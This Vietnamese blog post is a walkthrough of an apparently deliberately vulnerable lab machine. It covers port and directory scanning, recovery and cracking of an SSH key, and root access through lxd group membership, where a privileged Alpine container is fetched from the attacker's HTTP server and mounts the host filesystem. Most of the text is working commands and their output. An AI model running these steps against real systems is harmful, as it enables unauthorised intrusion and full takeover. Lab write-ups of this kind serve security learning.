Bước 1: Thu thập thông tinSau khi bật máy chủ victim mình thực hiện dò quét cổng dịch vụ đang mở
nmap -sC -sV -Pn ipvictim
Mình thấy mở cổng 22, 80. Mình bắt đầu đi khai thác xem dịch vụ chạy trên cổng có gì
Bước 2: Khai thác dịch vụ web
Mình truy cập website
Kiểm tra mã nguồn thấy một ghi chú của ai đó tên "john"
Qua đó mình có thể xác định rằng sẽ có một user là john
Thử dò quét các path url
gobuster dir -u http://ipvictim -w/usr/share/dirb/wordlists/common.txt
Thấy một dict.lst, mình tải về. Truy cập "secret" mình lấy được một key RSA sử dụng cho SSH
Mình tải key đó về thử giải mã tìm mật khẩu bằng công cụ johnzipper
Thành công tìm được mật khẩu và mình thử SSH với user john
Đọc cờ đầu tại thư mục của user
Bước 3: Khai thác dịch vụ SSH - Leo thang
Mình kiểm tra thông tin quyền của user john bằng lệnh id
john@exploitable:/tmp$ id
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
Ở máy Kali mình thực hiện tải gói build khai thác và tạo nó. Đồng thời chạy lệnh khởi tại download server :
# git clone https://github.com/saghul/lxd-alpine-builder.git
# cd lxd-alpine-builder
# ./build-alpine
# python3 -m http.server 8000
Ở máy victim
john@exploitable:/tmp$ wget http://ip-kali-vpn:8000/alpine-v3.12-x86_64-20200902_1515.tar.gz
john@exploitable:/tmp$ lxc image list
+-------+-------------+--------+-------------+------+------+-------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+-------+-------------+--------+-------------+------+------+-------------+
john@exploitable:/tmp$ lxc image import ./alpine-v3.12-x86_64-20200902_1515.tar.gz --alias myimage
Image imported with fingerprint: 65dd1e31f4cc984602e9be582bf80196cd05d44531b18ad8208ce062f09105ab
john@exploitable:/tmp$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+-----------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+---------+--------------+--------+-------------------------------+--------+--------+-----------------------------+
| myimage | 65dd1e31f4cc | no | alpine v3.12 (20200902_15:15) | x86_64 | 3.04MB | Sep 2, 2020 at 1:18pm (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+-----------------------------+
john@exploitable:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
john@exploitable:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
john@exploitable:/tmp$ lxc start ignite
john@exploitable:/tmp$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
Có root rồi việc cuối là đọc cờ bạn tự làm nốt nhé 😜😜😜
The end !!!
![Advent of Cyber 2 [2020] - Tryhackme - Write Up - Day 1](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLeXq7qj1vf7kjbSrUV-Q4iHtFE4W6cB1LFOWeuCvPqUIfsbJmzQk4xeZzqkKKz8t4mdohTiFeVTuXfpxKbZGp1OHj-KzpaOTJ7oB4ISB0lAR5ckzGMxY4rJyTYkBNySjgyYHyxXRiX9p0/w72-h72-p-k-no-nu/)
0 Comments